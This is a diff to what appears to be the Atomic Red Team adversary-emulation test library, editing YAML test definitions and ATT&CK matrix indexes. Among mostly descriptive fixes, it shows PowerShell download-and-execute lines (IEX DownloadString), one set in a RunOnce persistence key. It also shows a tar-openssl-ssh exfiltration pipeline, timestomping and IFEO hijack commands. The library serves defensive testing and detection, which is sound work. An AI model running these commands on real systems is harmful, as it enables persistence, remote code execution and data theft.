       supported_platforms:
@@ -2839,7 +2849,7 @@ persistence:
         name: powershell
         command: |
           $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
-          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat`")"'
+          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
           Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
     - name: Startup Folder
       description: 'Add Shortcut To Startup via PowerShell
@@ -4238,11 +4248,6 @@ defense-evasion:
         [Additional Reference](http://www.labofapenetrationtester.com/2018/04/dcshadow.html)
       supported_platforms:
       - windows
-      input_arguments:
-        output_file:
-          description: TODO
-          type: todo
-          default: TODO
       executor:
         name: manual
         steps: |
@@ -4983,7 +4988,7 @@ defense-evasion:
           mkdir .hidden-directory
           echo "this file is hidden" > .hidden-directory/.hidden-file
     - name: Mac Hidden file
-      description: 'TODO
+      description: 'Hide a file on MacOS
 
 '
       supported_platforms:
@@ -5016,29 +5021,39 @@ defense-evasion:
 
 '
     - name: Hidden files
-      description: 'Requieres Apple Dev Tools
+      description: 'Requires Apple Dev Tools
 
 '
       supported_platforms:
       - macos
+      input_arguments:
+        filename:
+          description: path of file to hide
+          type: path
+          default: "/tmp/evil"
       executor:
         name: sh
         command: 'setfile -a V #{filename}
 
 '
     - name: Hide a Directory
-      description: 'xxx
+      description: 'Hide a directory on MacOS
 
 '
       supported_platforms:
       - macos
+      input_arguments:
+        filename:
+          description: path of file to hide
+          type: path
+          default: "/tmp/evil"
       executor:
         name: sh
         command: 'chflags hidden #{filename}
 
 '
     - name: Show all hidden files
-      description: 'xxx
+      description: 'Show all hidden files on MacOS
 
 '
       supported_platforms:
@@ -5048,8 +5063,8 @@ defense-evasion:
         command: 'defaults write com.apple.finder AppleShowAllFiles YES
 
 '
-    - name: Create visible Directories
-      description: 'xxx
+    - name: Create Visible Directories
+      description: 'Create visible directories on MacOS and Linux
 
 '
       supported_platforms:
@@ -5063,7 +5078,7 @@ defense-evasion:
           ls
           ls visible-directory
     - name: Create hidden directories and files
-      description: 'xxx
+      description: 'Create hidden directories and files on Nix platforms
 
 '
       supported_platforms:
@@ -5250,7 +5265,7 @@ defense-evasion:
       identifier: T1183
     atomic_tests:
     - name: IFEO Add Debugger
-      description: 'TODO
+      description: 'Leverage Global Flags Settings
 
 '
       supported_platforms:
@@ -5270,7 +5285,7 @@ defense-evasion:
           File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
 
 '
-    - name: IFEO GLobal Flags
+    - name: IFEO Global Flags
       description: 'Leverage Global Flags Settings
 
 '
@@ -6491,7 +6506,7 @@ defense-evasion:
       identifier: T1150
     atomic_tests:
     - name: Plist Modification
-      description: 'TODO
+      description: 'Modify MacOS plist file in one of two directories
 
 '
       supported_platforms:
@@ -7040,17 +7055,6 @@ defense-evasion:
         name: sh
         command: 'sudo modprobe #{rootkit_file}
 
-'
-    - name: LD_PRELOAD based Rootkit
-      description: 'LD_PRELOAD based Rootkit
-
-'
-      supported_platforms:
-      - linux
-      executor:
-        name: sh
-        command: 'export LD_PRELOAD=$PWD/#{rootkit_file}
-
 '
     - name: Windows Signed Driver Rootkit Test
       description: |
@@ -7446,6 +7450,7 @@ defense-evasion:
         target_filename:
           description: Path of file that we are going to stomp on last access time
           type: Path
+          default: "/opt/filename"
       executor:
         name: sh
         command: 'touch -a -t 197001010000.00 #{target_filename}
@@ -7462,6 +7467,7 @@ defense-evasion:
         target_filename:
           description: Path of file that we are going to stomp on last access time
           type: Path
+          default: "/opt/filename"
       executor:
         name: sh
         command: 'touch -m -t 197001010000.00 #{target_filename}
@@ -7480,6 +7486,7 @@ defense-evasion:
         target_filename:
           description: Path of file that we are going to stomp on last access time
           type: Path
+          default: "/opt/filename"
       executor:
         name: sh
         command: |
@@ -8612,7 +8619,7 @@ privilege-escalation:
       identifier: T1183
     atomic_tests:
     - name: IFEO Add Debugger
-      description: 'TODO
+      description: 'Leverage Global Flags Settings
 
 '
       supported_platforms:
@@ -8632,7 +8639,7 @@ privilege-escalation:
           File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
 
 '
-    - name: IFEO GLobal Flags
+    - name: IFEO Global Flags
       description: 'Leverage Global Flags Settings
 
 '
@@ -8725,7 +8732,7 @@ privilege-escalation:
       identifier: T1160
     atomic_tests:
     - name: Launch Daemon
-      description: 'TODO
+      description: 'Utilize LaunchDaemon to launch `Hello World`
 
 '
       supported_platforms:
@@ -8926,7 +8933,7 @@ privilege-escalation:
       identifier: T1150
     atomic_tests:
     - name: Plist Modification
-      description: 'TODO
+      description: 'Modify MacOS plist file in one of two directories
 
 '
       supported_platforms:
@@ -13321,7 +13328,7 @@ execution:
       identifier: T1168
     atomic_tests:
     - name: Cron Job
-      description: 'TODO
+      description: 'Set a cron job
 
 '
       supported_platforms:
@@ -13340,7 +13347,7 @@ execution:
 
 '
     - name: Cron Job
-      description: 'TODO
+      description: 'Manually set a cron job
 
 '
       supported_platforms:
@@ -15610,8 +15617,8 @@ lateral-movement:
       type: attack-pattern
       identifier: T1105
     atomic_tests:
-    - name: xxxx
-      description: 'xxxx
+    - name: rsync - scp - sftp remote file copy
+      description: 'Utilize rsync, scp and sftp to perform a remote file copy
 
 '
       supported_platforms:
@@ -15620,7 +15627,7 @@ lateral-movement:
       executor:
         name: bash
         command: |
-          ### TODO: Not sure how to handle commands that need to be run on multiple systems
+          ### FIX: Not sure how to handle commands that need to be run on multiple systems
 
           # Adversary System Configuration
           # Ensure SSH access has been configured for an adversary account
@@ -16212,7 +16219,7 @@ collection:
       - windows
       executor:
         name: powershell
-        command: '"IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat'')"
+        command: '"IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat'')"
           > c:\windows\pi.log
 
 '
@@ -16547,9 +16554,8 @@ exfiltration:
       identifier: T1002
     atomic_tests:
     - name: Compress Data for Exfiltration With PowerShell
-      description: 'TODO
-
-'
+      description: "An adversary may compress data (e.g., sensitive documents) that
+        is collected prior to exfiltration \n"
       supported_platforms:
       - windows
       input_arguments:
@@ -16567,9 +16573,8 @@ exfiltration:
 
 '
     - name: Compress Data for Exfiltration With Rar
-      description: 'TODO
-
-'
+      description: "An adversary may compress data (e.g., sensitive documents) that
+        is collected prior to exfiltration \n"
       supported_platforms:
       - windows
       input_arguments:
@@ -16587,9 +16592,8 @@ exfiltration:
 
 '
     - name: Data Compressed - nix
-      description: 'TODO
-
-'
+      description: "An adversary may compress data (e.g., sensitive documents) that
+        is collected prior to exfiltration \n"
       supported_platforms:
       - linux
       - macos
@@ -16667,7 +16671,7 @@ exfiltration:
       identifier: T1022
     atomic_tests:
     - name: Data Encrypted
-      description: 'TODO
+      description: 'Encrypt data for exiltration
 
 '
       supported_platforms:
@@ -16738,11 +16742,6 @@ exfiltration:
       - centos
       - ubuntu
       - linux
-      input_arguments:
-        output_file:
-          description: TODO
-          type: todo
-          default: TODO
       executor:
         name: sh
         command: |
@@ -16833,6 +16832,19 @@ exfiltration:
       - centos
       - ubuntu
       - linux
+      input_arguments:
+        domain:
+          description: target SSH domain
+          type: url
+          default: target.example.com
+        user_name:
+          description: username for domain
+          type: string
+          default: atomic
+        password:
+          description: password for user
+          type: string
+          default: atomic
       executor:
         name: sh
         command: 'tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh
@@ -16931,6 +16943,89 @@ command-and-control:
       modified: '2018-04-18T17:59:24.739Z'
       type: attack-pattern
     atomic_tests: []
+  T1090:
+    technique:
+      name: Connection Proxy
+      description: |-
+        A connection proxy is used to direct network traffic between systems or act as an intermediary for network communications. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools)
+
+        The definition of a proxy can also be expanded out to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other.
+
+        The network may be within a single organization or across organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion.
+
+        Detection: Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Network activities disassociated from user-driven actions from processes that normally require user direction are suspicious.
+
+        Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
+
+        Platforms: Linux, macOS, Windows
+
+        Data Sources: Process use of network, Process monitoring, Netflow/Enclave netflow, Packet capture
+
+        Requires Network: Yes
+
+        Contributors: Walker Johnson
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
+      external_references:
+      - url: https://attack.mitre.org/wiki/Technique/T1090
+        source_name: mitre-attack
+        external_id: T1090
+      - description: 'Wilhoit, K. (2013, March 4). In-Depth Look: APT Attack Tools
+          of the Trade. Retrieved December 2, 2015.'
+        source_name: Trend Micro APT Attack Tools
+        url: http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/
+      - description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        source_name: University of Birmingham C2
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      created: '2017-05-31T21:31:08.479Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_data_sources:
+      - Process use of network
+      - Process monitoring
+      - Netflow/Enclave netflow
+      - Packet capture
+      x_mitre_network_requirements: true
+      x_mitre_contributors:
+      - Walker Johnson
+      id: attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea
+      modified: '2018-04-18T17:59:24.739Z'
+      type: attack-pattern
+      identifier: T1090
+    atomic_tests:
+    - name: Connection Proxy
+      description: |
+        Enable traffic redirection.
+
+        To undo changes made by this test:
+          unset http_proxy
+          unset https_proxy
+
+        Note that this test may conflict with pre-existing system configuration.
+      supported_platforms:
+      - macos
+      - linux
+      input_arguments:
+        proxy_server:
+          description: Proxy server URL (host:port)
+          type: url
+          default: 127.0.0.1:8080
+        proxy_scheme:
+          description: Protocol to proxy (http or https)
+          type: string
+          default: http
+      executor:
+        name: sh
+        command: 'export #{proxy_scheme}_proxy=#{proxy_server}
+
+'
   T1132:
     technique:
       name: Data Encoding
@@ -17066,8 +17161,8 @@ command-and-control:
       type: attack-pattern
       identifier: T1105
     atomic_tests:
-    - name: xxxx
-      description: 'xxxx
+    - name: rsync - scp - sftp remote file copy
+      description: 'Utilize rsync, scp and sftp to perform a remote file copy
 
 '
       supported_platforms:
@@ -17076,7 +17171,7 @@ command-and-control:
       executor:
         name: bash
         command: |
-          ### TODO: Not sure how to handle commands that need to be run on multiple systems
+          ### FIX: Not sure how to handle commands that need to be run on multiple systems
 
           # Adversary System Configuration
           # Ensure SSH access has been configured for an adversary account

atomics/linux-index.md

@@ -12,7 +12,7 @@
 - [T1158 Hidden Files and Directories](./T1158/T1158.md)
   - Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
   - Atomic Test #3: Hidden file [macos, linux]
-  - Atomic Test #7: Create visible Directories [macos, linux]
+  - Atomic Test #7: Create Visible Directories [macos, linux]
   - Atomic Test #8: Create hidden directories and files [macos, linux]
 - T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1168 Local Job Scheduling](./T1168/T1168.md)
@@ -67,7 +67,7 @@
 - T1017 Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1105 Remote File Copy](./T1105/T1105.md)
-  - Atomic Test #1: xxxx [linux, macos]
+  - Atomic Test #1: rsync - scp - sftp remote file copy [linux, macos]
 - T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1184 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -146,7 +146,7 @@
 - [T1158 Hidden Files and Directories](./T1158/T1158.md)
   - Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
   - Atomic Test #3: Hidden file [macos, linux]
-  - Atomic Test #7: Create visible Directories [macos, linux]
+  - Atomic Test #7: Create Visible Directories [macos, linux]
   - Atomic Test #8: Create hidden directories and files [macos, linux]
 - T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1070 Indicator Removal on Host](./T1070/T1070.md)
@@ -163,7 +163,6 @@
 - [T1014 Rootkit](./T1014/T1014.md)
   - Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
   - Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
-  - Atomic Test #3: LD_PRELOAD based Rootkit [linux]
 - [T1064 Scripting](./T1064/T1064.md)
   - Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
 - [T1151 Space after Filename](./T1151/T1151.md)
@@ -196,7 +195,8 @@
 # command-and-control
 - T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1090 Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1090 Connection Proxy](./T1090/T1090.md)
+  - Atomic Test #1: Connection Proxy [macos, linux]
 - T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1132 Data Encoding](./T1132/T1132.md)
@@ -211,7 +211,7 @@
 - T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1105 Remote File Copy](./T1105/T1105.md)
-  - Atomic Test #1: xxxx [linux, macos]
+  - Atomic Test #1: rsync - scp - sftp remote file copy [linux, macos]
 - T1071 Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

atomics/linux-matrix.md

@@ -3,7 +3,7 @@
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | [.bash_profile and .bashrc](./T1156/T1156.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Bash History](./T1139/T1139.md) | [Account Discovery](./T1087/T1087.md) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](./T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](./T1055/T1055.md) | [Clear Command History](./T1146/T1146.md) | [Brute Force](./T1110/T1110.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](./T1176/T1176.md) | [Setuid and Setgid](./T1166/T1166.md) | [Disabling Security Tools](./T1089/T1089.md) | [Credentials in Files](./T1081/T1081.md) | [File and Directory Discovery](./T1083/T1083.md) | [Remote File Copy](./T1105/T1105.md) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](./T1176/T1176.md) | [Setuid and Setgid](./T1166/T1166.md) | [Disabling Security Tools](./T1089/T1089.md) | [Credentials in Files](./T1081/T1081.md) | [File and Directory Discovery](./T1083/T1083.md) | [Remote File Copy](./T1105/T1105.md) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | [Connection Proxy](./T1090/T1090.md) |
 | [Spearphishing Attachment](./T1193/T1193.md) | [Local Job Scheduling](./T1168/T1168.md) | [Create Account](./T1136/T1136.md) | [Sudo](./T1169/T1169.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](./T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scripting](./T1064/T1064.md) | [Hidden Files and Directories](./T1158/T1158.md) | [Sudo Caching](./T1206/T1206.md) | [File Deletion](./T1107/T1107.md) | [Input Capture](./T1056/T1056.md) | [Password Policy Discovery](./T1201/T1201.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Source](./T1153/T1153.md) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [HISTCONTROL](./T1148/T1148.md) | [Network Sniffing](./T1040/T1040.md) | [Permission Groups Discovery](./T1069/T1069.md) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) |

atomics/macos-index.md

@@ -16,7 +16,7 @@
   - Atomic Test #4: Hidden files [macos]
   - Atomic Test #5: Hide a Directory [macos]
   - Atomic Test #6: Show all hidden files [macos]
-  - Atomic Test #7: Create visible Directories [macos, linux]
+  - Atomic Test #7: Create Visible Directories [macos, linux]
   - Atomic Test #8: Create hidden directories and files [macos, linux]
 - T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1161 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -120,7 +120,7 @@
 - [T1037 Logon Scripts](./T1037/T1037.md)
   - Atomic Test #2: Logon Scripts - Mac [macos]
 - [T1105 Remote File Copy](./T1105/T1105.md)
-  - Atomic Test #1: xxxx [linux, macos]
+  - Atomic Test #1: rsync - scp - sftp remote file copy [linux, macos]
 - T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1184 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -206,7 +206,7 @@
   - Atomic Test #4: Hidden files [macos]
   - Atomic Test #5: Hide a Directory [macos]
   - Atomic Test #6: Show all hidden files [macos]
-  - Atomic Test #7: Create visible Directories [macos, linux]
+  - Atomic Test #7: Create Visible Directories [macos, linux]
   - Atomic Test #8: Create hidden directories and files [macos, linux]
 - [T1147 Hidden Users](./T1147/T1147.md)
   - Atomic Test #1: Hidden Users [macos]
@@ -237,7 +237,8 @@
 # command-and-control
 - T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1090 Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1090 Connection Proxy](./T1090/T1090.md)
+  - Atomic Test #1: Connection Proxy [macos, linux]
 - T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1132 Data Encoding](./T1132/T1132.md)
@@ -252,7 +253,7 @@
 - T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1105 Remote File Copy](./T1105/T1105.md)
-  - Atomic Test #1: xxxx [linux, macos]
+  - Atomic Test #1: rsync - scp - sftp remote file copy [linux, macos]
 - T1071 Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

atomics/macos-matrix.md

@@ -3,7 +3,7 @@
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](./T1155/T1155.md) | [.bash_profile and .bashrc](./T1156/T1156.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Bash History](./T1139/T1139.md) | [Account Discovery](./T1087/T1087.md) | [AppleScript](./T1155/T1155.md) | [Audio Capture](./T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | [Browser Extensions](./T1176/T1176.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](./T1146/T1146.md) | [Brute Force](./T1110/T1110.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Create Account](./T1136/T1136.md) | [Launch Daemon](./T1160/T1160.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials in Files](./T1081/T1081.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Create Account](./T1136/T1136.md) | [Launch Daemon](./T1160/T1160.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials in Files](./T1081/T1081.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | [Connection Proxy](./T1090/T1090.md) |
 | [Spearphishing Attachment](./T1193/T1193.md) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](./T1150/T1150.md) | [Disabling Security Tools](./T1089/T1089.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](./T1083/T1083.md) | [Logon Scripts](./T1037/T1037.md) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](./T1152/T1152.md) | [Hidden Files and Directories](./T1158/T1158.md) | [Process Injection](./T1055/T1055.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Capture](./T1056/T1056.md) | [Network Service Scanning](./T1046/T1046.md) | [Remote File Copy](./T1105/T1105.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Job Scheduling](./T1168/T1168.md) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](./T1166/T1166.md) | [File Deletion](./T1107/T1107.md) | [Input Prompt](./T1141/T1141.md) | [Network Share Discovery](./T1135/T1135.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) |

atomics/matrix.md

@@ -3,7 +3,7 @@
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](./T1155/T1155.md) | [.bash_profile and .bashrc](./T1156/T1156.md) | [Access Token Manipulation](./T1134/T1134.md) | [Access Token Manipulation](./T1134/T1134.md) | [Account Manipulation](./T1098/T1098.md) | [Account Discovery](./T1087/T1087.md) | [AppleScript](./T1155/T1155.md) | [Audio Capture](./T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [CMSTP](./T1191/T1191.md) | [Accessibility Features](./T1015/T1015.md) | [Accessibility Features](./T1015/T1015.md) | [BITS Jobs](./T1197/T1197.md) | [Bash History](./T1139/T1139.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Brute Force](./T1110/T1110.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
